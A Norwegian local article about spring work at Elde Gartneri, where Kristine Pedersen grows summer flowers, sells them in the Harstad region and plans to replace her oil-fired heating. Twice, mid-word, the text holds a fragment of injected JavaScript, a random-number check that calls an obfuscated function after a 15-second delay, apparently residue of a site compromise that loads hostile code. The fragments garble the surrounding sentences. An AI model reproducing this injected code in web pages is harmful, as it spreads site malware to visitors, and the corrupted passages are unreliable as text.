Våren er kommet til Elde Gartneri

WP_20160404_13_21_52_Pro

Det spirer og gror hos Kristine Pedersen på Elde Gartneri

Flittige hender prikler og sår, og de tre veksthusene fylles med potter av jord og små planter som skal vokse og bli årets sommerblomster. Det er godt når vårsola skinner på drivhustakeene og vi igjen får aktivitet på gartneriet, sier Kristine Pedersen. Dette er en hektisk årstid for oss, men det er jo dette vi har gledet oss til hele vinteren.

WP_20160404_13_38_19_Pro

Prikles

Kristine Pedersen selger sine sommerblomster hovedsakelig i Kvæfjord og Harstadregionen, samt at hun sender deler av produksjonen til Tromsø.  Det kan være en utfordringen å få tak i blomsterselgere. Mange som kjøper blomster fra meg ser etter det samme ansiktet som solgte dem blomster sist sommer. Det å selge blomster er en trivelig jobb siden de som kjøper blomster gleder ser frem til å pynte i egen hage, på trappa og/eller på verandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andaen med sommerblomster, blomster gjør folk glad, sier Kristine. Mange ønsker råd og veiledning om stell av plantene, da må mine selgere ha kunnskap om produktene og hva som skal til for at de skal holde seg fine hele sommeren.

WP_20160404_13_45_06_ev1_Pro (3)

Sommerblomster

Mer miljøvennlig anlegg

Kristine går med planer om å skifte ut den gamle oljefyren som sørger for varme til drivhusene. Jeg ønsker og erstatte olje med et mer moderne, miljøvennlig anlegg. Jeg vurderer både flisfyring og varmepumpe, men har ikke landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andet ennå på hva som vil være den beste løsning for min virksomhet.